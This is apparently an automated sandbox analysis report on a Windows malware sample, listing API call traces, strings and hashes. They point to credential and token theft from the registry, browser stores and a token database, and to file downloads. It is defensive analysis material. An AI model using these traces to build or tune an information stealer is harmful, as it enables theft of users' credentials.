                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: OpenProcesslstrcpymemset
                                  • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                  • API String ID: 224852652-2614523144
                                  • Opcode ID: 6115dca80d6cf9bb482a94d79f66c36139396751b61d0524125d78405d7c6e46
                                  • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                  • Opcode Fuzzy Hash: 6115dca80d6cf9bb482a94d79f66c36139396751b61d0524125d78405d7c6e46
                                  • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 022B77A9
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 022B77E6
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 022B786A
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022B7871
                                  • wsprintfA.USER32 ref: 022B78A7
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$\$B
                                  • API String ID: 1544550907-183544611
                                  • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                  • Instruction ID: 82b7799760c15f37da967aabd8588d3655e2cc3e4fb044f393a69f173578be1a
                                  • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                  • Instruction Fuzzy Hash: 33419EB1D10248EBDF11DFD4CC44BEEBBB9AF48700F000199E509A7284D7756A84CBA5
                                  APIs
                                    • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                    • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                    • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                    • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                    • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                    • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                  • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                  • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                  • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                  • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                  • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                  • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                  • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                  • task.LIBCPMTD ref: 004076FB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                  • String ID: :
                                  • API String ID: 3191641157-3653984579
                                  • Opcode ID: d19bb9034be843adce2da22a5665dbbd0c26fc1f75395a982b8fbed49acf7942
                                  • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                                  • Opcode Fuzzy Hash: d19bb9034be843adce2da22a5665dbbd0c26fc1f75395a982b8fbed49acf7942
                                  • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                  APIs
                                  • memset.MSVCRT ref: 00407314
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                  • RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                  • HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                    • Part of subcall function 00409240: vsprintf_s.MSVCRT ref: 0040925B
                                  • task.LIBCPMTD ref: 00407555
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                  • String ID: Password
                                  • API String ID: 2698061284-3434357891
                                  • Opcode ID: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                  • Instruction ID: ef12ebdd473109685825b75701b45193a1214ac884297e43e73859b9717fa869
                                  • Opcode Fuzzy Hash: 5be579466c40cef3c45c052574d28d43fb537906c51874de2e9a9a2bc2377bc3
                                  • Instruction Fuzzy Hash: B8614DB5D0416C9BDB24DB50CD41BDAB7B8BF44304F0081EAE689A6281DB746FC9CFA5
                                  APIs
                                  • memset.MSVCRT ref: 022B433C
                                  • RegOpenKeyExA.ADVAPI32(80000001,0064A4D8,00000000,00020119,?), ref: 022B435B
                                  • RegQueryValueExA.ADVAPI32(?,0064A0D4,00000000,00000000,00000000,000000FF), ref: 022B437F
                                  • RegCloseKey.ADVAPI32(?), ref: 022B4389
                                  • lstrcat.KERNEL32(?,00000000), ref: 022B43AE
                                  • lstrcat.KERNEL32(?,0064A168), ref: 022B43C2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                  • String ID: @&x$&x
                                  • API String ID: 2623679115-4213947583
                                  • Opcode ID: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                  • Instruction ID: 5d1b69553ed5dd6e164586ad2261daa526d4601344fe90e874f49fb03f101ae5
                                  • Opcode Fuzzy Hash: 5690b8b16156ff116e39c423b9c20f7378d9982cb7fd98343760b82f2f9cb978
                                  • Instruction Fuzzy Hash: EF41C4B6950208BBDB15FBE0DC95FEE333EAB49300F004558A61957184EA756698CFE2
                                  APIs
                                  • memset.MSVCRT ref: 004140D5
                                  • RegOpenKeyExA.ADVAPI32(80000001,00781F38,00000000,00020119,?), ref: 004140F4
                                  • RegQueryValueExA.ADVAPI32(?,007826D0,00000000,00000000,00000000,000000FF), ref: 00414118
                                  • RegCloseKey.ADVAPI32(?), ref: 00414122
                                  • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414147
                                  • lstrcatA.KERNEL32(?,00782700), ref: 0041415B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseOpenQueryValuememset
                                  • String ID: @&x$&x
                                  • API String ID: 2623679115-4213947583
                                  • Opcode ID: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                  • Instruction ID: 42b23dca6cf9d61fcd17bb79f48ce0988bb9dd5848c5c15250a36de7d2584b3c
                                  • Opcode Fuzzy Hash: bc2d94edd70f49bf8f62656b9ca3487d8b5429edb2de975fb07ca5a133c360a1
                                  • Instruction Fuzzy Hash: 6941B6BAD402087BDB14EBE0DC46FEE777DAB88304F00455DB61A571C1EA795B888B92
                                  APIs
                                  • lstrcatA.KERNEL32(?,00782718,?,00000104,?,00000104,?,00000104,?,00000104), ref: 004147DB
                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414801
                                  • lstrcatA.KERNEL32(?,?), ref: 00414820
                                  • lstrcatA.KERNEL32(?,?), ref: 00414834
                                  • lstrcatA.KERNEL32(?,0074A3F0), ref: 00414847
                                  • lstrcatA.KERNEL32(?,?), ref: 0041485B
                                  • lstrcatA.KERNEL32(?,00781C58), ref: 0041486F
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                    • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                    • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                                    • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                                    • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                  • String ID: 0aA
                                  • API String ID: 167551676-2786531170
                                  • Opcode ID: 385f363be4903eac86b7405a7b11766b7307db1bed5a32dad561bb07a2df71f9
                                  • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                                  • Opcode Fuzzy Hash: 385f363be4903eac86b7405a7b11766b7307db1bed5a32dad561bb07a2df71f9
                                  • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00781780,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00781780,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                  • __aulldiv.LIBCMT ref: 00418172
                                  • __aulldiv.LIBCMT ref: 00418180
                                  • wsprintfA.USER32 ref: 004181AC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB$@
                                  • API String ID: 2886426298-3474575989
                                  • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                  • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                  • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                  • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                  APIs
                                    • Part of subcall function 022BAA07: lstrcpy.KERNEL32(?,00000000), ref: 022BAA4D
                                    • Part of subcall function 022A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A51
                                    • Part of subcall function 022A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A68
                                    • Part of subcall function 022A4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022A4A7F
                                    • Part of subcall function 022A4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022A4AA0
                                    • Part of subcall function 022A4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022A4AB0
                                  • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 022A6376
                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 022A63AE
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 022A63F6
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 022A641A
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 022A6443
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 022A6471
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 022A64B0
                                  • InternetCloseHandle.WININET(?), ref: 022A64BA
                                  • InternetCloseHandle.WININET(00000000), ref: 022A64C7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID:
                                  • API String ID: 4287319946-0
                                  • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                  • Instruction ID: 413c442be1dec4148f1135650f1bfa83de82ea8129f239c348c78a68cfbd85f5
                                  • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                  • Instruction Fuzzy Hash: F1517FB5A60318ABDF20DFE4CC54BEE7779AF04705F008098B605A71C4DBB46A85CFA5
                                  APIs
                                  • memset.MSVCRT ref: 022B4FEE
                                    • Part of subcall function 022B9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022B9072
                                  • lstrcat.KERNEL32(?,00000000), ref: 022B5017
                                  • lstrcat.KERNEL32(?,00421000), ref: 022B5034
                                    • Part of subcall function 022B4B77: wsprintfA.USER32 ref: 022B4B93
                                    • Part of subcall function 022B4B77: FindFirstFileA.KERNEL32(?,?), ref: 022B4BAA
                                  • memset.MSVCRT ref: 022B507A
                                  • lstrcat.KERNEL32(?,00000000), ref: 022B50A3
                                  • lstrcat.KERNEL32(?,00421020), ref: 022B50C0
                                    • Part of subcall function 022B4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 022B4BD8
                                    • Part of subcall function 022B4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 022B4BEE
                                    • Part of subcall function 022B4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 022B4DE4
                                    • Part of subcall function 022B4B77: FindClose.KERNEL32(000000FF), ref: 022B4DF9
                                  • memset.MSVCRT ref: 022B5106
                                  • lstrcat.KERNEL32(?,00000000), ref: 022B512F
                                  • lstrcat.KERNEL32(?,00421038), ref: 022B514C
                                    • Part of subcall function 022B4B77: wsprintfA.USER32 ref: 022B4C17
                                    • Part of subcall function 022B4B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 022B4C2C
                                    • Part of subcall function 022B4B77: wsprintfA.USER32 ref: 022B4C49
                                    • Part of subcall function 022B4B77: PathMatchSpecA.SHLWAPI(?,?), ref: 022B4C85
                                    • Part of subcall function 022B4B77: lstrcat.KERNEL32(?,0064A524), ref: 022B4CB1
                                    • Part of subcall function 022B4B77: lstrcat.KERNEL32(?,00420FF8), ref: 022B4CC3
                                    • Part of subcall function 022B4B77: lstrcat.KERNEL32(?,?), ref: 022B4CD7
                                    • Part of subcall function 022B4B77: lstrcat.KERNEL32(?,00420FFC), ref: 022B4CE9
                                    • Part of subcall function 022B4B77: lstrcat.KERNEL32(?,?), ref: 022B4CFD
                                    • Part of subcall function 022B4B77: CopyFileA.KERNEL32(?,?,00000001), ref: 022B4D13
                                    • Part of subcall function 022B4B77: DeleteFileA.KERNEL32(?), ref: 022B4D98
                                  • memset.MSVCRT ref: 022B5192
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID:
                                  • API String ID: 4017274736-0
                                  • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                  • Instruction ID: a3d428c106ec5251fe61ddb6a58749cce240c290ec4c9cea1b160a8dc5b6ab09
                                  • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                  • Instruction Fuzzy Hash: 2A41D579A5031467C710F7F0EC46FD93739AF25701F404494B689660C4EEB957D88FA2
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 022B8397
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022B839E
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 022B83BF
                                  • __aulldiv.LIBCMT ref: 022B83D9
                                  • __aulldiv.LIBCMT ref: 022B83E7
                                  • wsprintfA.USER32 ref: 022B8413
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: @
                                  • API String ID: 2774356765-2766056989
                                  • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                  • Instruction ID: 67ba8297c0b1361aebd5835e4141762d7d31a48664173f6ef1a2fec1be687522
                                  • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                  • Instruction Fuzzy Hash: 82214AB1E54218ABDB00DFD4DC49FEEB7B9FB44B44F204609F605BB284C7B869008BA5
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                  • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                  • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                  • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                  • API String ID: 1440504306-1079375795
                                  • Opcode ID: b74f765d32784b8827112e529741beea93106054c3ae35f717795dfd1135bcd2
                                  • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                  • Opcode Fuzzy Hash: b74f765d32784b8827112e529741beea93106054c3ae35f717795dfd1135bcd2
                                  • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess$DefaultLangUser
                                  • String ID: B
                                  • API String ID: 1494266314-2248957098
                                  • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                  • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                  • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                  • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                  APIs
                                  • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                    • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                  • memset.MSVCRT ref: 00409EE8
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                  • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                  • API String ID: 1977917189-1096346117
                                  • Opcode ID: 9c666873091c2eb9f79dea775311e52b8b7ab5e3d76554732510085addbe92b4
                                  • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                  • Opcode Fuzzy Hash: 9c666873091c2eb9f79dea775311e52b8b7ab5e3d76554732510085addbe92b4
